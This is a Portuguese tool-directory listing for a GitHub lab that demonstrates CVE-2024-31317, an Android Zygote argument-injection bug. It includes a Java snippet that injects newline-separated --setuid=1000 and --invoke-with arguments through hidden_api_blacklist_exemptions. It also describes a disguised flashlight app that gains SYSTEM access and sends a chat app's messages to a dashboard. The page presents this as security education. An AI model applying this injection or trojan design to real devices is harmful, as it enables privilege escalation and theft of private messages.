Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
ZygoteExploitDemo — Demonstração educacional da vulnerabilidade de injeção Zygote CVE-2024-31317 no Android | Kitploit
Ferramentas/GitHubGitHub/gitamans/zygoteexploitdemo
Segurança AndroidEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoPentesting de Apps MóveisTestes de PenetraçãoSegurança MóvelAprendizado e EducaçãoExploração de BináriosLabs e Prática
GitHubgitamans/zygoteexploitdemo
22há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ZygoteExploitDemo

Demonstração educacional da vulnerabilidade de injeção Zygote CVE-2024-31317 no Android

Ver Repositório

🔥 ZygoteExploitDemo - CVE-2024-31317 Laboratório de Segurança Android

🚨 Demonstração Educacional da Vulnerabilidade de Injeção no Zygote do Android

GitHub stars GitHub forks GitHub license


📋 Visão Geral

Este laboratório demonstra a CVE-2024-31317, uma vulnerabilidade crítica do Android que permite que um aplicativo malicioso eleve privilégios para o nível SYSTEM (UID 1000) e contorne a sandbox do Android para ler dados de outros aplicativos em tempo real.

🎯 O Que Esta Demonstração Mostra


🏗️ Estrutura do Projeto

root@kitploit:~
ZygoteExploitDemo/
├── 📱 apps/
│   ├── SecureChat/              # Victim app (Jetpack Compose)
│   │   ├── Encrypted messages stored in SQLite
│   │   └── Simulates WhatsApp-style encryption
│   │
│   ├── FlashlightPro/           # Malicious app with exploit
│   │   ├── Normal flashlight UI (distraction)
│   │   ├── Background exploit service
│   │   └── WRITE_SECURE_SETTINGS permission
│   │
│   └── MonitorService/          # SYSTEM-level reader
│       ├── Runs with UID 1000 after exploit
│       ├── Reads SecureChat database
│       └── Exfiltrates to dashboard
│
├── 📊 dashboard/                # Flask web dashboard
│   └── app.py                   # Shows stolen messages live
│
├── 📜 scripts/                  # Automation scripts
│   ├── setup_vulnerable_emulator.sh
│   ├── build_all_apps.sh
│   ├── install_all_apps.sh
│   ├── run_exploit.py
│   └── monitor_logs.sh
│
├── 🎯 exploits/                 # Exploit information
│   ├── CVE-2024-31317.md
│   └── payloads.txt
│
└── 📁 tamplates/                # Code templates
    ├── exploit_template.java
    └── dashboard_template.html

🔧 Detalhes Técnicos

A Vulnerabilidade

CVE-2024-31317 existe na forma como o processo Zygote do Android lida com a configuração do sistema hidden_api_blacklist_exemptions. Devido à falta de sanitização de entrada, um invasor pode injetar caracteres de nova linha para adicionar argumentos arbitrários aos comandos Zygote.

Attack Vector:

root@kitploit:~
Settings.Global.putString(
    contentResolver,
    "hidden_api_blacklist_exemptions",
    "LClass1;->method1(\n" +
    "7\n" +
    "--setuid=1000\n" +     // Run as SYSTEM
    "--setgid=1000\n" +     // Run as SYSTEM group
    "--invoke-with\n" +
    "am start-service ...;\n"
);

Versões Afetadas

VersãoStatus
Android 9 - 14❌ Vulnerável (antes do patch de junho de 2024)
Android 14+✅ Corrigido (atualização de segurança de junho de 2024)
Android 15+✅ Seguro

🚀 Guia de Início Rápido

Pré-requisitos

  • ✅ Android Studio (última versão)
  • ✅ Python 3.8+ com Flask
  • ✅ Android SDK com ferramentas de plataforma
  • ✅ 10GB de espaço livre em disco para o emulador

Passo 1: Clonar o Repositório

root@kitploit:~
git clone https://github.com/GitAmanS/ZygoteExploitDemo.git
cd ZygoteExploitDemo

Passo 2: Configurar Emulador Vulnerável

root@kitploit:~
cd scripts
chmod +x *.sh
./setup_vulnerable_emulator.sh

# Start the emulator
emulator -avd vulnerable_android_12

Passo 3: Compilar e Instalar Aplicativos

root@kitploit:~
# In a new terminal
cd ZygoteExploitDemo/scripts
./build_all_apps.sh
./install_all_apps.sh

Passo 4: Iniciar o Painel

root@kitploit:~
cd ../dashboard
pip3 install flask flask-cors
python3 app.py

📱 Abra http://localhost:5000 no seu navegador

Passo 5: Executar o Exploit

root@kitploit:~
cd ../scripts
python3 run_exploit.py

Passo 6: Assista à Mágica ✨

  1. Abra o aplicativo SecureChat no emulador
  2. Envie algumas mensagens de teste
  3. Veja-as aparecerem no painel instantaneamente! 🔴

📸 Vídeo de Demonstração

🎬 Vídeo de demonstração em breve


🔬 Como Funciona - Passo a Passo

  1. FlashlightPro solicita permissão WRITE_SECURE_SETTINGS
  2. O código do exploit injeta payload malicioso nas configurações do Zygote
  3. Zygote gera MonitorService com privilégios SYSTEM (UID 1000)
  4. O serviço SYSTEM contorna as restrições da sandbox do Android
  5. Leitura direta do banco de dados de /data/data/com.securechat/databases/
  6. Exfiltração para o painel Flask via HTTP POST
  7. Exibição em tempo real de mensagens criptografadas roubadas

📚 Recursos de Aprendizado

  • Android Security Bulletins
  • CVE-2024-31317 Details
  • Original PoC by CleoV2

🤝 Contribuindo

Contribuições são bem-vindas! Por favor:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Envie um Pull Request

Áreas para contribuição:

  • 🎯 Payloads de exploit adicionais
  • 🛡️ Melhores métodos de detecção
  • 📖 Documentação melhorada
  • 🌍 Tradução para outros idiomas

📄 Licença

Licença MIT - Veja o arquivo LICENSE para detalhes


👨‍💻 Autor

Aman - @GitAmanS


⭐ Suporte

Se você achou isso educativo, por favor, dê uma estrela! ⭐


Feito para pesquisadores de segurança, por um pesquisador de segurança

Lembre-se: Com grandes poderes vêm grandes responsabilidades 🕷️

Baixar ferramenta
EtapaDescriçãoVisual
1Usuário instala aplicativo "Flashlight Pro" de aparência inocente🔦
2App explora CVE-2024-31317 para obter acesso SYSTEM💉
3Serviço de nível SYSTEM lê mensagens do "SecureChat"👁️
4Mensagens roubadas aparecem no painel ao vivo📊